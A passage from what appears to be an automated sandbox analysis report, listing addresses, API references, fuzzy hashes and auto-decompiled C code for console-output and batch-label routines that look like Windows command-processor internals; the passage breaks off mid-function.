                                              0x002b9c96
                                              0x002b9c97
                                              0x002b9c97
                                              0x002b9ca1
                                              0x002b9c7b
                                              0x002b9c7b
                                              0x002b9c81
                                              0x002b9c87
                                              0x002b9ca9
                                              0x002a5c66
                                              0x002a5c6d
                                              0x002b9cd4
                                              0x002a5c80
                                              0x002a5c80
                                              0x002a5c85
                                              0x002a5c88
                                              0x002a5c8c
                                              0x002b9cb1
                                              0x002b9cc0
                                              0x002b9cc8
                                              0x002a5c92
                                              0x002a5c96
                                              0x002a5ca5
                                              0x002a5caa
                                              0x002a5caa
                                              0x002a5cb0
                                              0x002a5cb0
                                              0x002a5cb5
                                              0x002a5cb8
                                              0x002a5cba
                                              0x002a5cba
                                              0x002a5cbd
                                              0x002a5cbf
                                              0x002a5cc6
                                              0x002a5cc6
                                              0x002a5cc8
                                              0x002a5cc8
                                              0x002a5c40
                                              0x002a5c32
                                              0x002a5cda
                                              0x002b99ff
                                              0x002b99ff
                                              0x002b9a05
                                              0x00000000
                                              0x002b9a0b
                                              0x002b9a0b
                                              0x002b9a0e
                                              0x002b9a10
                                              0x00000000
                                              0x002b9a1f
                                              0x002b9a1a
                                              0x002b9a1c
                                              0x00000000
                                              0x002b9a1c
                                              0x00000000
                                              0x002b9a1a
                                              0x002b9a25
                                              0x002b9a6f
                                              0x002b9a6f
                                              0x002b9a76
                                              0x00000000
                                              0x002b9a7c
                                              0x00000000
                                              0x002b9a7c
                                              0x002b9a27
                                              0x002b9a2a
                                              0x002b9a30
                                              0x002b9a30
                                              0x002b9a40
                                              0x002b9a46
                                              0x002b9a49
                                              0x002b9a4f
                                              0x002b9a57
                                              0x002b9a59
                                              0x002b9a60
                                              0x00000000
                                              0x002b9a62
                                              0x002b9a62
                                              0x002b9a68
                                              0x00000000
                                              0x002b9a6a
                                              0x002b9a6a
                                              0x002b9a6d
                                              0x00000000
                                              0x002b9a6d
                                              0x002b9a68
                                              0x002b9a60
                                              0x002b9a25
                                              0x002b9a05
                                              0x002b99f9
                                              0x00000000
                                              0x002b99d4
                                              0x002b99bc
                                              0x00000000
                                              0x002b99b1
                                              0x002ab6e2
                                              0x002ab6e2
                                              0x002ab6ec
                                              0x002ab6f6
                                              0x002ab6f9
                                              0x002ab702
                                              0x002ab702
                                              0x00000000

                                              APIs
                                              • _get_osfhandle.MSVCRT ref: 002B99E9
                                              • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 002B99F1
                                              • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000002,?,?,?,?,-00000001,-00000001,-00000001,-00000001), ref: 002B9A30
                                              • _get_osfhandle.MSVCRT ref: 002B9A49
                                              • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 002B9A51
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: Console$Write_get_osfhandle$Mode
                                              • String ID:
                                              • API String ID: 1066134489-0
                                              • Opcode ID: 5a798966a076c0ece012357aff9dd0b1ef64677eae9ab0c05a32cfe45bbf9496
                                              • Instruction ID: 339c4ccf8c5a176706c684b539a6bd2ed85ca1c2b720a4f8f207b541d992d398
                                              • Opcode Fuzzy Hash: 5a798966a076c0ece012357aff9dd0b1ef64677eae9ab0c05a32cfe45bbf9496
                                              • Instruction Fuzzy Hash: D741E431E202119BDF24DF78D889BEEB3A9EB40780F14446AEA05DB181EA70DDA0CF50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002AE5A8, Relevance: 9.1, APIs: 6, Instructions: 115COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 72%
                                              			E002AE5A8(struct HINSTANCE__** __ebx, struct HINSTANCE__* __edx, intOrPtr __edi, void* __ebp, void* _a4, intOrPtr _a8, struct HINSTANCE__* _a12, struct HINSTANCE__* _a16, struct HINSTANCE__* _a20, struct HINSTANCE__* _a24, struct HINSTANCE__* _a28, void _a32, void* _a536, intOrPtr _a544, void* _a548, int _a552, char _a556, int _a560, signed int _a572) {
				void* _v0;
				struct HINSTANCE__* _t57;
				struct HINSTANCE__* _t59;
				struct HINSTANCE__* _t63;
				struct HINSTANCE__* _t64;
				struct HINSTANCE__ _t66;
				int _t69;
				int _t74;
				struct HINSTANCE__* _t76;
				struct HINSTANCE__* _t83;
				struct HINSTANCE__* _t84;
				void* _t85;
				struct HINSTANCE__* _t86;
				struct HINSTANCE__* _t87;
				struct HINSTANCE__* _t88;
				struct HINSTANCE__* _t100;
				struct HINSTANCE__** _t102;
				void* _t103;
				struct HINSTANCE__* _t108;
				struct HINSTANCE__ _t114;
				intOrPtr _t132;
				struct HINSTANCE__* _t133;
				void* _t134;
				void* _t135;
				struct HINSTANCE__* _t136;
				struct HINSTANCE__* _t137;
				signed int _t140;
				void* _t142;

				_t132 = __edi;
				_t126 = __edx;
				_t102 = __ebx;
				goto L1;
				L33:
				__eflags =  *((short*)( *((intOrPtr*)(_t126 + 0x38)))) - 0x3a;
				if( *((short*)( *((intOrPtr*)(_t126 + 0x38)))) != 0x3a) {
					goto L4;
				}
				_t136 = E002B00B0(0x50);
				__eflags = _t136;
				if(_t136 == 0) {
					L73:
					_t57 = 1;
					L32:
					_pop(_t134);
					_pop(_t135);
					_pop(_t103);
					__eflags = _a572 ^ _t140;
					return E002B6FD0(_t57, _t103, _a572 ^ _t140, _t126, _t134, _t135);
				}
				_t136->i = 0;
				_t63 = E002ADF40(L"GOTO");
				 *(_t136 + 0x38) = _t63;
				__eflags = _t63;
				if(_t63 == 0) {
					goto L73;
				}
				_t64 = E002ADF40( *((intOrPtr*)(_a24 + 0x38)));
				 *(_t136 + 0x3c) = _t64;
				__eflags = _t64;
				if(_t64 == 0) {
					goto L73;
				}
				_t126 = 1;
				_t64->i = 0x20;
				 *(_t136 + 0x40) = 0;
				_a28 = 1;
				L13:
				if(_t132 != 0) {
					__eflags = _t136;
					if(_t136 != 0) {
						_a20 = 0;
					}
				}
				_t114 = _t136->i;
				if(_t114 != 0 ||  *( *(_t136 + 0x38)) != 0x3a) {
					if(_t126 != 0) {
						_a28 = 0;
						_t66 = _t114;
					} else {
						_t66 = _t114;
						if( *0x2cd0c8 == 1) {
							_t66 = _t114;
							__eflags = _t114 - 0x3b;
							if(_t114 != 0x3b) {
								__eflags =  *0x2e8530;
								_t66 = _t114;
								if( *0x2e8530 == 0) {
									E002C6FF0(_t114);
									_t126 = 0;
									E002C2ED0(_t136, 0);
									E002B25D9(L"\r\n");
									_t66 = _t136->i;
									_t140 = _t140 + 4;
								}
							}
						}
					}
					if(_t66 == 0x3b) {
						_t136 =  *(_t136 + 0x38);
					}
					_a552 = 0;
					_a556 = 1;
					_a560 = 0x104;
					memset( &_a32, 0, 0x104);
					_t140 = _t140 + 0xc;
					if(_a556 == 0) {
						_t69 = 0x104;
					} else {
						_t69 = 0x7fe7;
					}
					if(E002B0C70( &_a32, _t69) < 0) {
						E002B0DE8(_t70,  &_a32);
						goto L73;
					} else {
						if(_t136 == 0) {
							_t136 = 0;
							_a16 = 0;
							L28:
							__imp__??_V@YAXPAX@Z(_a552);
							_t140 = _t140 + 4;
							goto L29;
						}
						if( *_t136 != 0 || E002ADFC0(0x2a,  *(_t136 + 0x38),  &_a16) != 0xffffffff) {
							L25:
							_t126 = _t136;
							_a16 = E002B0E00(2, _t136);
							E002B06C0(2);
							_t74 = GetConsoleOutputCP();
							 *0x2d3854 = _t74;
							GetCPInfo(_t74, 0x2d3840);
							_t137 =  *0x2cd5f8; // 0x0
							if(_t137 == 0) {
								_t76 =  *0x2cd0d0; // 0xffffffff
								__eflags = _t76 - 0xffffffff;
								if(_t76 != 0xffffffff) {
									L67:
									__eflags = _t76;
									if(_t76 != 0) {
										_t137 = GetProcAddress(_t76, "SetThreadUILanguage");
										 *0x2cd5f8 = _t137;
									}
									L69:
									__eflags = _t137;
									if(_t137 != 0) {
										goto L26;
									}
									SetThreadLocale(0x409);
									L27:
									_t136 = _a12;
									goto L28;
								}
								_t76 = GetModuleHandleW(L"KERNEL32.DLL");
								_t137 =  *0x2cd5f8; // 0x0
								 *0x2cd0d0 = _t76;
								__eflags = _t76 - 0xffffffff;
								if(_t76 == 0xffffffff) {
									goto L69;
								}
								goto L67;
							}
							L26:
							 *0x2e94b4(0);
							_t137->i();
							goto L27;
						} else {
							_t83 = E002AD7D4( *(_t136 + 0x38), 0x2a);
							__eflags = _t83;
							if(_t83 != 0) {
								goto L25;
							}
							_t39 = _t83 + 0x3f; // 0x3f
							_t84 = E002AD7D4( *(_t136 + 0x38), _t39);
							__eflags = _t84;
							if(_t84 != 0) {
								goto L25;
							}
							_t131 = _a552;
							__eflags = _a552;
							if(__eflags == 0) {
								_t131 =  &_a32;
							}
							_t85 = E002B10B0(_t136, _t131, __eflags, _a560);
							__eflags = _t85 - 2;
							if(_t85 != 2) {
								goto L25;
							} else {
								__eflags =  *(_t136 + 0x34);
								if( *(_t136 + 0x34) == 0) {
									L61:
									_t86 = _a552;
									__eflags = _t86;
									if(__eflags == 0) {
										_t86 =  &_a32;
									}
									_t126 =  *_t102;
									_push(_t86);
									_push(_t102[1]);
									_t87 = E002B1F52(_t102, _t136,  *_t102, _t132, _t136, __eflags);
									__eflags = _t87;
									if(_t87 != 0) {
										goto L71;
									} else {
										_t136 = 0;
										_a12 = 1;
										_a8 = 0;
										goto L28;
									}
								} else {
									_t126 = _t136;
									_t88 = E002C76C0(_a24, _t136);
									__eflags = _t88;
									if(_t88 != 0) {
										L71:
										__imp__??_V@YAXPAX@Z(_a544);
										_t140 = _t140 + 4;
										_t57 = 1;
										goto L32;
									}
									goto L61;
								}
							}
						}
					}
				} else {
					L41:
					_t136 = _a16;
					L29:
					if( *0x2e3cc4 != _t102) {
						L78:
						_t57 = _t136;
						goto L32;
					} else {
						_t132 = _a20;
						_t126 = _a24;
						L1:
						if( *0x2cd544 != 0) {
							E002C921A(_t102, _t132);
							_t126 = _a24;
						}
						 *0x2cd590 = 0;
						if( *0x2e3cc9 == 0 || _t132 == 0) {
							goto L4;
						} else {
							goto L33;
						}
					}
				}
				L4:
				_t133 = E002B0662(_t102);
				if(_t133 == 0xffffffff) {
					goto L73;
				}
				_t59 = E002AEEF0(3, _t133, _t102[4]);
				_t136 = _t59;
				__imp___tell(_t133);
				_t102[2] = _t59;
				_t142 = _t140 + 4;
				_t3 = _t133 - 3; // -3
				_t108 = 0;
				_t126 = _t133;
				if(_t3 > 0x5b) {
					L8:
					__imp___close(_t133);
					_t140 = _t142 + 4;
					if(_t136 == 0) {
						goto L41;
					}
					if(_t136 == 1 ||  *0x2df980 == 0x234a) {
						E002C82EB(_t108);
						__eflags =  *0x2cd0c8 - 1;
						if( *0x2cd0c8 == 1) {
							__eflags =  *0x2e8530;
							if( *0x2e8530 == 0) {
								E002C6FF0(_t108);
								E002AC108(_t108, 0x2371, 1, 0x2d3892);
								_t140 = _t140 + 0xc;
							}
						}
						E002C9287(_t108);
						__imp__longjmp(0x2db8b8, 1);
						goto L78;
					} else {
						if(_t136 == 0xffffffff) {
							_t57 = _a16;
							goto L32;
						} else {
							_t132 = _a20;
							_t126 = _a28;
							goto L13;
						}
					}
				}
				if(_t133 > 0x1f) {
					_t44 = _t133 - 0x20; // -32
					_t100 = 1 + (_t44 >> 5);
					__eflags = _t100;
					_t108 = _t100;
					do {
						_t126 = _t126 - 0x20;
						_t100 = _t100 - 1;
						__eflags = _t100;
					} while (_t100 != 0);
				}
				asm("btr eax, edx");
				goto L8;
			}































                                              0x002ae5a8
                                              0x002ae5a8
                                              0x002ae5a8
                                              0x002ae5a8
                                              0x002ae7ad
                                              0x002ae7b0
                                              0x002ae7b4
                                              0x00000000
                                              0x00000000
                                              0x002ae7c4
                                              0x002ae7c6
                                              0x002ae7c8
                                              0x002bbfc5
                                              0x002bbfc5
                                              0x002ae798
                                              0x002ae79f
                                              0x002ae7a0
                                              0x002ae7a1
                                              0x002ae7a2
                                              0x002ae7ac
                                              0x002ae7ac
                                              0x002ae7d3
                                              0x002ae7d9
                                              0x002ae7de
                                              0x002ae7e1
                                              0x002ae7e3
                                              0x00000000
                                              0x00000000
                                              0x002ae7f0
                                              0x002ae7f5
                                              0x002ae7f8
                                              0x002ae7fa
                                              0x00000000
                                              0x00000000
                                              0x002ae805
                                              0x002ae80a
                                              0x002ae80d
                                              0x002ae814
                                              0x002ae667
                                              0x002ae669
                                              0x002ae81d
                                              0x002ae81f
                                              0x002ae827
                                              0x002ae827
                                              0x002ae81f
                                              0x002ae66f
                                              0x002ae673
                                              0x002ae684
                                              0x002ae832
                                              0x002ae836
                                              0x002ae68a
                                              0x002ae691
                                              0x002ae693
                                              0x002ae89d
                                              0x002ae89f
                                              0x002ae8a2
                                              0x002bbebb
                                              0x002bbec2
                                              0x002bbec4
                                              0x002bbeca
                                              0x002bbecf
                                              0x002bbed3
                                              0x002bbedd
                                              0x002bbee2
                                              0x002bbee4
                                              0x002bbee4
                                              0x002bbec4
                                              0x002ae8a2
                                              0x002ae693
                                              0x002ae69c
                                              0x002ae846
                                              0x002ae846
                                              0x002ae6ab
                                              0x002ae6b9
                                              0x002ae6c1
                                              0x002ae6cc
                                              0x002ae6d1
                                              0x002ae6dc
                                              0x002bbeec
                                              0x002ae6e2
                                              0x002ae6e2
                                              0x002ae6e2
                                              0x002ae6f3
                                              0x002bbfc0
                                              0x00000000
                                              0x002ae6f9
                                              0x002ae6fb
                                              0x002bbef6
                                              0x002bbef8
                                              0x002ae76b
                                              0x002ae772
                                              0x002ae778
                                              0x00000000
                                              0x002ae778
                                              0x002ae704
                                              0x002ae721
                                              0x002ae721
                                              0x002ae72d
                                              0x002ae731
                                              0x002ae736
                                              0x002ae742
                                              0x002ae747
                                              0x002ae74d
                                              0x002ae755
                                              0x002bbf4d
                                              0x002bbf52
                                              0x002bbf55
                                              0x002bbf72
                                              0x002bbf72
                                              0x002bbf74
                                              0x002bbf82
                                              0x002bbf84
                                              0x002bbf84
                                              0x002bbf8a
                                              0x002bbf8a
                                              0x002bbf8c
                                              0x00000000
                                              0x00000000
                                              0x002bbf97
                                              0x002ae767
                                              0x002ae767
                                              0x00000000
                                              0x002ae767
                                              0x002bbf5c
                                              0x002bbf62
                                              0x002bbf68
                                              0x002bbf6d
                                              0x002bbf70
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002bbf70
                                              0x002ae75b
                                              0x002ae75f
                                              0x002ae765
                                              0x00000000
                                              0x002ae84e
                                              0x002ae856
                                              0x002ae85b
                                              0x002ae85d
                                              0x00000000
                                              0x00000000
                                              0x002ae866
                                              0x002ae869
                                              0x002ae86e
                                              0x002ae870
                                              0x00000000
                                              0x00000000
                                              0x002ae876
                                              0x002ae87d
                                              0x002ae87f
                                              0x002ae8ad
                                              0x002ae8ad
                                              0x002ae88a
                                              0x002ae88f
                                              0x002ae892
                                              0x00000000
                                              0x002ae898
                                              0x002bbf01
                                              0x002bbf05
                                              0x002bbf1a
                                              0x002bbf1a
                                              0x002bbf21
                                              0x002bbf23
                                              0x002bbf25
                                              0x002bbf25
                                              0x002bbf29
                                              0x002bbf2d
                                              0x002bbf2e
                                              0x002bbf31
                                              0x002bbf36
                                              0x002bbf38
                                              0x00000000
                                              0x002bbf3a
                                              0x002bbf3a
                                              0x002bbf3c
                                              0x002bbf44
                                              0x00000000
                                              0x002bbf44
                                              0x002bbf07
                                              0x002bbf0b
                                              0x002bbf0d
                                              0x002bbf12
                                              0x002bbf14
                                              0x002bbfa2
                                              0x002bbfa9
                                              0x002bbfaf
                                              0x002bbfb2
                                              0x00000000
                                              0x002bbfb2
                                              0x00000000
                                              0x002bbf14
                                              0x002bbf05
                                              0x002ae892
                                              0x002ae704
                                              0x002ae83d
                                              0x002ae83d
                                              0x002ae83d
                                              0x002ae77b
                                              0x002ae781
                                              0x002bc011
                                              0x002bc011
                                              0x00000000
                                              0x002ae787
                                              0x002ae787
                                              0x002ae78b
                                              0x002ae5b0
                                              0x002ae5b7
                                              0x002bbe97
                                              0x002bbe9c
                                              0x002bbe9c
                                              0x002ae5c4
                                              0x002ae5cb
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002ae5cb
                                              0x002ae781
                                              0x002ae5d5
                                              0x002ae5dc
                                              0x002ae5e1
                                              0x00000000
                                              0x00000000
                                              0x002ae5f1
                                              0x002ae5f7
                                              0x002ae5f9
                                              0x002ae5ff
                                              0x002ae602
                                              0x002ae605
                                              0x002ae608
                                              0x002ae60a
                                              0x002ae60f
                                              0x002ae62b
                                              0x002ae62c
                                              0x002ae632
                                              0x002ae637
                                              0x00000000
                                              0x00000000
                                              0x002ae640
                                              0x002bbfcf
                                              0x002bbfd4
                                              0x002bbfdb
                                              0x002bbfdd
                                              0x002bbfe4
                                              0x002bbfe6
                                              0x002bbff7
                                              0x002bbffc
                                              0x002bbffc
                                              0x002bbfe4
                                              0x002bbfff
                                              0x002bc00b
                                              0x00000000
                                              0x002ae656
                                              0x002ae659
                                              0x002ae794
                                              0x00000000
                                              0x002ae65f
                                              0x002ae65f
                                              0x002ae663
                                              0x00000000
                                              0x002ae663
                                              0x002ae659
                                              0x002ae640
                                              0x002ae614
                                              0x002bbea5
                                              0x002bbeab
                                              0x002bbeab
                                              0x002bbeac
                                              0x002bbeae
                                              0x002bbeae
                                              0x002bbeb1
                                              0x002bbeb1
                                              0x002bbeb1
                                              0x002bbeb6
                                              0x002ae621
                                              0x00000000

                                              APIs
                                              • _tell.MSVCRT ref: 002AE5F9
                                              • _close.MSVCRT ref: 002AE62C
                                              • memset.MSVCRT ref: 002AE6CC
                                              • GetConsoleOutputCP.API-MS-WIN-CORE-CONSOLE-L1-1-0(00007FE7), ref: 002AE736
                                              • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,002D3840), ref: 002AE747
                                              • ??_V@YAXPAX@Z.MSVCRT ref: 002AE772
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: ConsoleInfoOutput_close_tellmemset
                                              • String ID:
                                              • API String ID: 1380661413-0
                                              • Opcode ID: 536ca42eca6c6def7bc83416d58bc7d25fa96c4ae6851d054d46b31f10df9ba2
                                              • Instruction ID: 3dbe970afa9ff959cb5ee4751aa7fa0fc16ebcfd3b618a0a4e16152aac85984f
                                              • Opcode Fuzzy Hash: 536ca42eca6c6def7bc83416d58bc7d25fa96c4ae6851d054d46b31f10df9ba2
                                              • Instruction Fuzzy Hash: BF41E4309102428FDB31DF18E88C76AB7E5AF85354F15092DE855972F0EB74DCA6CB52
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002B2616, Relevance: 9.1, APIs: 6, Instructions: 90COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 19%
                                              			E002B2616(long __ecx, DWORD* __edx) {
				void _v8;
				void* _t4;
				long _t5;
				int _t21;
				long _t43;

				_push(__ecx);
				_t40 = __edx;
				_t43 = 0;
				if(__edx <= 0) {
					L5:
					_t5 = _t43;
					L6:
					return _t5;
				}
				if(E002B269C(_t4) != 0) {
					__imp__AcquireSRWLockShared(0x2e7f20);
					_t7 =  &_v8;
					__imp___get_osfhandle(0);
					_t21 = WriteConsoleW( &_v8, 1, __ecx, __edx, _t7);
					if(_t21 == 0) {
						_t43 = GetLastError();
					}
					__imp__ReleaseSRWLockShared(0x2e7f20);
				} else {
					_t40 = __edx + __edx;
					_t21 = E002B27C8( &_v8, __ecx, _t40,  &_v8);
				}
				if(_t21 == 0 || _v8 != _t40) {
					_t43 = GetLastError();
					if(_t43 == 0) {
						_t43 = 0x70;
					}
					if(E002B0178(_t10) == 0) {
						if(E002C9953(_t11, 1) == 0) {
							E002C985A(_t43);
						} else {
							_push(0);
							_push(0x2364);
							E002AC5A2(1);
						}
						_t5 = 1;
						goto L6;
					} else {
						_push(0);
						_push(0x1d);
						E002AC5A2(1);
						goto L5;
					}
				} else {
					goto L5;
				}
			}








                                              0x002b261b
                                              0x002b261f
                                              0x002b2621
                                              0x002b2627
                                              0x002b2659
                                              0x002b2659
                                              0x002b265b
                                              0x002b2661
                                              0x002b2661
                                              0x002b2633
                                              0x002b2667
                                              0x002b266f
                                              0x002b2677
                                              0x002b2685
                                              0x002b2689
                                              0x002bd681
                                              0x002bd681
                                              0x002b2694
                                              0x002b2635
                                              0x002b2638
                                              0x002b2646
                                              0x002b2646
                                              0x002b264a
                                              0x002bd68e
                                              0x002bd692
                                              0x002bd696
                                              0x002bd696
                                              0x002bd6a3
                                              0x002bd6be
                                              0x002bd6d2
                                              0x002bd6c0
                                              0x002bd6c0
                                              0x002bd6c2
                                              0x002bd6c7
                                              0x002bd6cd
                                              0x002bd6d7
                                              0x00000000
                                              0x002bd6a5
                                              0x002bd6a5
                                              0x002bd6a7
                                              0x002bd6a9
                                              0x00000000
                                              0x002bd6af
                                              0x00000000
                                              0x00000000
                                              0x00000000

                                              APIs
                                                • Part of subcall function 002B269C: _get_osfhandle.MSVCRT ref: 002B26A7
                                                • Part of subcall function 002B269C: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,002AC5F8,?,?,?), ref: 002B26B6
                                                • Part of subcall function 002B269C: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,?,?,?,?,?,?,?,?,?,?,002AC5C6), ref: 002B26D2
                                                • Part of subcall function 002B269C: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(002E7F20,00000002), ref: 002B26E1
                                                • Part of subcall function 002B269C: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 002B26EC
                                                • Part of subcall function 002B269C: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(002E7F20,?,?,?,?,?,?,?,?,?,?,?,?,?,?,002AC5C6), ref: 002B26F5
                                              • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(002E7F20,00000000,?,?,002DB980,00000002,00000000,?,002B9CA6,%s %s ,?,00000000,00000000), ref: 002B2667
                                              • _get_osfhandle.MSVCRT ref: 002B2677
                                              • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,002B9CA6,%s %s ,?,00000000,00000000), ref: 002B267F
                                              • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(002E7F20), ref: 002B2694
                                                • Part of subcall function 002B27C8: _get_osfhandle.MSVCRT ref: 002B27DB
                                                • Part of subcall function 002B27C8: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,002DB980,000000FF,002CD620,00002000,00000000,00000000), ref: 002B281C
                                                • Part of subcall function 002B27C8: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,002CD620,-00000001,?,00000000), ref: 002B2831
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: LockShared$_get_osfhandle$AcquireConsoleFileReleaseWrite$ByteCharHandleModeMultiTypeWide
                                              • String ID:
                                              • API String ID: 4057327938-0
                                              • Opcode ID: dd4e78630ed305c09418c8a00e500cb4ee9d2555c0384044782928b1c5059649
                                              • Instruction ID: 160b86a87b8c6b00d18f3beadc15764bb597b83bcb6cc1ea7551ae677c5a2bc3
                                              • Opcode Fuzzy Hash: dd4e78630ed305c09418c8a00e500cb4ee9d2555c0384044782928b1c5059649
                                              • Instruction Fuzzy Hash: 18212132770346ABD7285BB57C8EBEA275CCB857D1F10003EFB0ADA181EDA0DC244560
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002B27C8, Relevance: 9.1, APIs: 6, Instructions: 86fileCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 79%
                                              			E002B27C8(void* __eax, void* __edx, long _a4, DWORD* _a8) {
				void* _v8;
				long _v12;
				long _v16;
				long _t15;
				void* _t17;
				void* _t24;
				DWORD* _t29;
				long _t31;
				long _t32;

				_t31 = _a4;
				_t23 = __edx;
				_v16 = _t31;
				__imp___get_osfhandle(_t24);
				_v8 = __eax;
				if( *0x2e805c != 0) {
					return WriteFile(__eax, __edx, _t31, _a8, 0);
				}
				_t29 = _a8;
				while(_t31 > 0x2000) {
					_t15 = WideCharToMultiByte( *0x2d3854, 0, _t23, 0x1000, 0x2cd620, 0x2000, 0, 0);
					_v12 = _t15;
					_t23 =  &(_t23[0x1000]);
					_t31 = _t31 - 0x2000;
					if(WriteFile(_v8, 0x2cd620, _t15, _t29, 0) == 0 ||  *_t29 != _v12) {
						L9:
						_t17 = 0;
						L7:
						return _t17;
					} else {
						continue;
					}
				}
				if(_t31 == 0) {
					L6:
					 *_t29 = _v16;
					_t17 = 1;
					goto L7;
				}
				_t5 = WideCharToMultiByte( *0x2d3854, 0, _t23, 0xffffffff, 0x2cd620, 0x2000, 0, 0) - 1; // -1
				_t32 = _t5;
				if(WriteFile(_v8, 0x2cd620, _t32, _t29, 0) == 0 ||  *_t29 != _t32) {
					goto L9;
				} else {
					goto L6;
				}
			}












                                              0x002b27d2
                                              0x002b27d5
                                              0x002b27d8
                                              0x002b27db
                                              0x002b27e9
                                              0x002b27ec
                                              0x00000000
                                              0x002bd70d
                                              0x002b27f3
                                              0x002b27f6
                                              0x002bd730
                                              0x002bd747
                                              0x002bd74a
                                              0x002bd74c
                                              0x002bd756
                                              0x002b2850
                                              0x002b2850
                                              0x002b2847
                                              0x00000000
                                              0x002bd767
                                              0x00000000
                                              0x002bd767
                                              0x002bd756
                                              0x002b2805
                                              0x002b283f
                                              0x002b2842
                                              0x002b2846
                                              0x00000000
                                              0x002b2846
                                              0x002b2825
                                              0x002b2825
                                              0x002b2839
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000

                                              APIs
                                              • _get_osfhandle.MSVCRT ref: 002B27DB
                                              • WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,002DB980,000000FF,002CD620,00002000,00000000,00000000), ref: 002B281C
                                              • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,002CD620,-00000001,?,00000000), ref: 002B2831
                                              • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,002DB980,?,?,00000000), ref: 002BD70D
                                              • WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,002DB980,00001000,002CD620,00002000,00000000,00000000,00000000), ref: 002BD730
                                              • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,002CD620,00000000,?,00000000), ref: 002BD74E
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: FileWrite$ByteCharMultiWide$_get_osfhandle
                                              • String ID:
                                              • API String ID: 3249344982-0
                                              • Opcode ID: 5cb5c2e3afb67459c88dd23c4e97ac41ea74a4763663696a9120aa5d5c918749
                                              • Instruction ID: e8caf9bfc2ac23f1e63736d72b0f4bf10da3253e1fe07b50cafabbec1d1fb711
                                              • Opcode Fuzzy Hash: 5cb5c2e3afb67459c88dd23c4e97ac41ea74a4763663696a9120aa5d5c918749
                                              • Instruction Fuzzy Hash: 8321A171A94305FBEB204F60EC49FAABBADEB04790F204129F954AB1D0D6B05D64DB64
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002C265F, Relevance: 9.1, APIs: 6, Instructions: 82memorysynchronizationCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 91%
                                              			E002C265F(int* __ecx) {
				void** _v0;
				void* _v8;
				int _t18;
				void** _t29;
				void** _t32;
				void* _t39;
				void* _t42;

				_push(__ecx);
				_t39 = __ecx;
				_t2 = _t39 + 4; // 0x4
				_t29 = _t2;
				_t32 = _t29;
				E002C2D6D(_t32,  &_v8);
				_t18 =  *__ecx - 1;
				 *__ecx = _t18;
				if(_t18 != 0) {
					_t42 = _v8;
					goto L18;
				} else {
					_t33 = __ecx[2];
					if(__ecx[2] != 0) {
						E002C2DB4(_t33);
					}
					_t42 = 0;
					 *(_t39 + 8) = 0;
					_t34 =  *(_t39 + 0xc);
					if( *(_t39 + 0xc) != 0) {
						E002C2DB4(_t34);
					}
					_t35 = _v8;
					 *(_t39 + 0xc) = _t42;
					if(_v8 != 0) {
						E002C2DE9(_t35);
					}
					_t18 = E002C25D6(_t35);
					if(_t18 == 0) {
						_t8 = _t39 + 0x18; // 0x18
						_t32 = _t8;
						E002C170A(_t32);
						if( *(_t39 + 0xc) != _t42 && CloseHandle( *(_t39 + 0xc)) == 0) {
							L10:
							_push(_t32);
							L11:
							_t32 = _v0;
							E002C2D56();
						}
